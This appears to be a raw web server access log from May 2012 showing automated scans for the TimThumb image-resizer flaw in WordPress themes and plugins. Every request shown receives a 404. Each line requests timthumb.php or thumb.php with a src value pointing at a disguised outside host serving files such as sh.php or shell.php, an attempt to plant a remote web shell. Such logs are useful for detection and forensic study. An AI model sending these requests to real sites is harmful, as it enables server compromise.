213.226.46.5 - - [14/May/2012:03:53:59 +0200] "GET //wp-content/themes/boldnews/lib/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
213.226.46.5 - - [14/May/2012:03:54:00 +0200] "GET //wp-content/themes/boldnews/lib/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
213.226.46.5 - - [14/May/2012:03:54:00 +0200] "GET //wp-content/themes/boldnews/lib/script/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
213.226.46.5 - - [14/May/2012:03:54:00 +0200] "GET //wp-content/themes/boldnews/lib/custom/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
213.226.46.5 - - [14/May/2012:03:54:00 +0200] "GET //wp-content/themes/boldnews/layouts/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
213.226.46.5 - - [14/May/2012:03:54:01 +0200] "GET //wp-content/themes/boldnews/includes/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
213.226.46.5 - - [14/May/2012:03:54:01 +0200] "GET //wp-content/themes/boldnews/custom/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
184.170.147.12 - - [14/May/2012:03:54:01 +0200] "GET /wp-content/themes/edupress/scripts/timthumb.php?src=http://picasa.com.djnick-mcgiany.com/mct.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
213.226.46.5 - - [14/May/2012:03:54:01 +0200] "GET //wp-content/themes/boldnews/framework/includes/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
213.226.46.5 - - [14/May/2012:03:54:01 +0200] "GET //wp-content/themes/boldnews/framework/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
213.226.46.5 - - [14/May/2012:03:54:02 +0200] "GET //wp-content/themes/boldnews/functions/scripts/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
213.226.46.5 - - [14/May/2012:03:54:02 +0200] "GET //wp-content/themes/boldnews/functions/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
184.170.147.12 - - [14/May/2012:03:54:02 +0200] "GET /wp-content/themes/edupress/scripts/timthumb.php?src=http://picasa.com.djnick-mcgiany.com/dm.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
213.226.46.5 - - [14/May/2012:03:54:02 +0200] "GET //wp-content/themes/boldnews/images/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
213.226.46.5 - - [14/May/2012:03:54:02 +0200] "GET //wp-content/themes/boldnews/inc/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
213.226.46.5 - - [14/May/2012:03:54:03 +0200] "GET //wp-content/themes/boldnews/includes/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
67.128.149.182 - - [14/May/2012:03:54:03 +0200] "GET /stats/log.keys.html//wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
67.128.149.182 - - [14/May/2012:03:54:04 +0200] "GET //wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
67.128.149.182 - - [14/May/2012:03:54:05 +0200] "GET //wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
67.128.149.182 - - [14/May/2012:03:54:06 +0200] "GET /stats//wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
67.128.149.182 - - [14/May/2012:03:54:07 +0200] "GET /stats//wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
67.128.149.182 - - [14/May/2012:03:54:08 +0200] "GET //wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
173.203.144.195 - - [14/May/2012:03:54:09 +0200] "GET /stats//wp-content/themes/welcome_inn/thumb.php?src=http://wordpress.com.junglerumblepartyvenue.co.za/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.144.195 - - [14/May/2012:03:54:09 +0200] "GET //wp-content/themes/welcome_inn/thumb.php?src=http://wordpress.com.junglerumblepartyvenue.co.za/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
93.95.98.95 - - [14/May/2012:03:54:20 +0200] "GET /stats//wp-content/themes/comfy/timthumb.php?src=http://blogger.com.ongcatavento.org/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
93.95.98.95 - - [14/May/2012:03:54:21 +0200] "GET //wp-content/themes/comfy/timthumb.php?src=http://blogger.com.ongcatavento.org/index.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.173.6.208 - - [14/May/2012:03:54:41 +0200] "GET /stats//wp-content/plugins/wp-marketplace/libs/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:03:54:42 +0200] "GET //wp-content/plugins/wp-marketplace/libs/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
155.212.12.151 - - [14/May/2012:03:54:49 +0200] "GET //wp-content/themes/boldnews//timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:49 +0200] "GET //wp-content/themes/boldnews/includes/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:49 +0200] "GET //wp-content/themes/boldnews/functions/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 332 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:49 +0200] "GET //wp-content/themes/boldnews/options/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:49 +0200] "GET //wp-content/themes/boldnews/scripts/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:49 +0200] "GET //wp-content/themes/boldnews/modules/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:49 +0200] "GET //wp-content/themes/boldnews/tools/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:49 +0200] "GET //wp-content/themes/boldnews/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:49 +0200] "GET //wp-content/themes/boldnews/js/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:49 +0200] "GET //wp-content/themes/boldnews/lib/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:49 +0200] "GET //wp-content/themes/boldnews/library/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:49 +0200] "GET //wp-content/themes/boldnews/tools/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/tools/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/scripts/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 336 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/scripts/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 339 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/library/functions/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/library/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 339 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/library/resource/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 339 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/library/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 336 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/lib/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/lib/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 332 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/lib/script/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/lib/custom/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/layouts/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/includes/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/custom/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/framework/includes/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 341 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/framework/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/functions/scripts/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/functions/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 341 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/images/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/inc/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/includes/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews//thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/includes/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/functions/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/options/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/scripts/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/modules/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:50 +0200] "GET //wp-content/themes/boldnews/tools/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/js/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 322 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/lib/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/library/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/tools/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/tools/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/scripts/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/scripts/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/library/functions/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/library/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/library/resource/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 336 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/library/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/lib/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/lib/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/lib/script/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/lib/custom/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/layouts/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/includes/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/custom/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/framework/includes/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/framework/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/functions/scripts/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/functions/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/images/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/inc/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
155.212.12.151 - - [14/May/2012:03:54:51 +0200] "GET //wp-content/themes/boldnews/includes/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
